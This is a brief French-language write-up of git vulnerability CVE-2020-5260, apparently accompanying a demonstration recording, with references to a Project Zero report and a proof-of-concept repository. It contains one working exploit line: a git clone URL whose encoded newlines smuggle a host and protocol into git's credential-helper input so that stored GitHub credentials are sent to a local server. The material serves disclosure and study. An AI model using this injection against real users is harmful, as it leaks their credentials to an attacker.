CVE-2020-5260
Enregistrement de la démonstration de CVE-2020-5260
- Lorsque git exécute une commande comme « git clone https://example.com », il demande à stocker les identifiants de l'hôte « example.com » avec le protocole « https » et, lorsque le serveur distant demande une authentification, il joint les identifiants renvoyés à la requête envoyée.
git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https

Références :
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
https://github.com/brompwnie/cve-2020-5260